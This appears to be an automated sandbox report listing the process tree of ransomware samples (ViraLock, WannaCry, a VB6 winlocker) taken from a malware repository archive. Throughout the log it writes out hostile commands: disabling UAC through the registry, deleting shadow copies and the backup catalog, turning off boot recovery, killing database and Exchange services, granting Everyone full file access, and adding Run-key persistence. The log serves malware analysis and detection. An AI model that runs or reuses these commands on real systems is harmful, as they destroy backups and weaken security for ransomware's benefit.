                                                                                        • Modifies visibility of file extensions in Explorer
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Modifies registry key
                                                                                        PID:4292
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                        14⤵
                                                                                        • Modifies registry key
                                                                                        PID:5016
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                        14⤵
                                                                                        • UAC bypass
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Modifies registry key
                                                                                        PID:2688
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VqgAcQgY.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                                        14⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:1968
                                                                                        • C:\Windows\SysWOW64\cscript.exe
                                                                                          cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                          15⤵
                                                                                            PID:1064
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                      12⤵
                                                                                      • Modifies visibility of file extensions in Explorer
                                                                                      • Modifies registry key
                                                                                      PID:324
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                      12⤵
                                                                                      • Modifies registry key
                                                                                      PID:2500
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                      12⤵
                                                                                      • UAC bypass
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Modifies registry key
                                                                                      PID:1128
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NEQkwcYs.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                                      12⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:800
                                                                                      • C:\Windows\SysWOW64\cscript.exe
                                                                                        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                        13⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:3236
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                  10⤵
                                                                                  • Modifies visibility of file extensions in Explorer
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Modifies registry key
                                                                                  PID:2640
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                  10⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Modifies registry key
                                                                                  PID:3640
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                  10⤵
                                                                                  • UAC bypass
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Modifies registry key
                                                                                  PID:2644
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FKEosAQA.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                                  10⤵
                                                                                    PID:2112
                                                                                    • C:\Windows\SysWOW64\cscript.exe
                                                                                      cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                      11⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:3228
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                8⤵
                                                                                • Modifies visibility of file extensions in Explorer
                                                                                • Modifies registry key
                                                                                PID:4444
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                8⤵
                                                                                • Modifies registry key
                                                                                PID:3784
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                8⤵
                                                                                • UAC bypass
                                                                                • Modifies registry key
                                                                                PID:1564
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mAssswsc.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                                8⤵
                                                                                  PID:3932
                                                                                  • C:\Windows\SysWOW64\cscript.exe
                                                                                    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                    9⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:4040
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                              6⤵
                                                                              • Modifies visibility of file extensions in Explorer
                                                                              • Modifies registry key
                                                                              PID:2632
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                              6⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Modifies registry key
                                                                              PID:3008
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                              6⤵
                                                                              • UAC bypass
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Modifies registry key
                                                                              PID:5080
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eyIscAIk.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                              6⤵
                                                                                PID:892
                                                                                • C:\Windows\SysWOW64\cscript.exe
                                                                                  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                  7⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:3652
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                            4⤵
                                                                            • Modifies visibility of file extensions in Explorer
                                                                            • Modifies registry key
                                                                            PID:3976
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                            4⤵
                                                                            • Modifies registry key
                                                                            PID:1572
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                            4⤵
                                                                            • UAC bypass
                                                                            • Modifies registry key
                                                                            PID:2708
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IIIYwgMU.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                            4⤵
                                                                              PID:2672
                                                                              • C:\Windows\SysWOW64\cscript.exe
                                                                                cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                5⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:4796
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                          2⤵
                                                                          • Modifies visibility of file extensions in Explorer
                                                                          • Modifies registry key
                                                                          PID:2148
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                          2⤵
                                                                          • Modifies registry key
                                                                          PID:684
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                          2⤵
                                                                          • UAC bypass
                                                                          • Modifies registry key
                                                                          PID:2080
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hgkwogkQ.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                          2⤵
                                                                            PID:2392
                                                                            • C:\Windows\SysWOW64\cscript.exe
                                                                              cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3308
                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\WannaCry.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\WannaCry.exe"
                                                                          1⤵
                                                                          • Drops startup file
                                                                          • Adds Run key to start application
                                                                          PID:3516
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c 36341738422429.bat
                                                                            2⤵
                                                                              PID:4060
                                                                              • C:\Windows\SysWOW64\cscript.exe
                                                                                cscript //nologo c.vbs
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:3260
                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\!WannaDecryptor!.exe
                                                                              !WannaDecryptor!.exe f
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:2632
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im MSExchange*
                                                                              2⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2816
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im Microsoft.Exchange.*
                                                                              2⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2024
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im sqlserver.exe
                                                                              2⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1628
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                3⤵
                                                                                  PID:3228
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im sqlwriter.exe
                                                                                2⤵
                                                                                • Kills process with taskkill
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:3440
                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\!WannaDecryptor!.exe
                                                                                !WannaDecryptor!.exe c
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:5636
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd.exe /c start /b !WannaDecryptor!.exe v
                                                                                2⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:5644
                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\!WannaDecryptor!.exe
                                                                                  !WannaDecryptor!.exe v
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:5228
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                    4⤵
                                                                                      PID:6980
                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                        wmic shadowcopy delete
                                                                                        5⤵
                                                                                          PID:7000
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\!WannaDecryptor!.exe
                                                                                    !WannaDecryptor!.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Sets desktop wallpaper using registry
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:5596
                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\WannaCrypt0r.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\WannaCrypt0r.exe"
                                                                                  1⤵
                                                                                  • Drops startup file
                                                                                  • Sets desktop wallpaper using registry
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:5028
                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                    attrib +h .
                                                                                    2⤵
                                                                                    • Views/modifies file attributes
                                                                                    PID:2640
                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                    icacls . /grant Everyone:F /T /C /Q
                                                                                    2⤵
                                                                                    • Modifies file permissions
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2672
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                    taskdl.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:932
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c 90941738422431.bat
                                                                                    2⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:1144
                                                                                    • C:\Windows\SysWOW64\cscript.exe
                                                                                      cscript.exe //nologo m.vbs
                                                                                      3⤵
                                                                                        PID:7096
                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                      attrib +h +s F:\$RECYCLE
                                                                                      2⤵
                                                                                      • Views/modifies file attributes
                                                                                      PID:908
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        3⤵
                                                                                          PID:1064
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:5804
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\TaskData\Tor\taskhsvc.exe
                                                                                          TaskData\Tor\taskhsvc.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:5400
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd.exe /c start /b @[email protected] vs
                                                                                        2⤵
                                                                                          PID:5336
                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:5852
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                              4⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:7088
                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                wmic shadowcopy delete
                                                                                                5⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1800
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5464
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Sets desktop wallpaper using registry
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:6084
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "tgikesyrkli880" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\tasksche.exe\"" /f
                                                                                          2⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:6428
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "tgikesyrkli880" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\tasksche.exe\"" /f
                                                                                            3⤵
                                                                                            • Adds Run key to start application
                                                                                            • Modifies registry key
                                                                                            PID:1144
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:360
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:7116
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:3468
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6956
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6768
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:292
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:312
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1732
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5452
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5380
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5888
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:860
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4044
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6776
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:236
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6536
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5336
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:1436
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:1072
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1540
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5632
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5052
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5900
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5940
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6496
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\WinlockerVB6Blacksod.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\WinlockerVB6Blacksod.exe"
                                                                                        1⤵
                                                                                        • Loads dropped DLL
                                                                                        • Enumerates connected drives
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3912
                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\WinlockerVB6Blacksod.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs "
                                                                                          2⤵
                                                                                          • Enumerates connected drives
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:6908
                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                        1⤵
                                                                                        • Modifies WinLogon for persistence
                                                                                        • Enumerates connected drives
                                                                                        • Drops file in Program Files directory
                                                                                        • Drops file in Windows directory
                                                                                        • Modifies data under HKEY_USERS
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:5320
                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding C766D8B967DE38D28DA2C8C948A0283C
                                                                                          2⤵
                                                                                          • Loads dropped DLL
                                                                                          • Blocklisted process makes network request
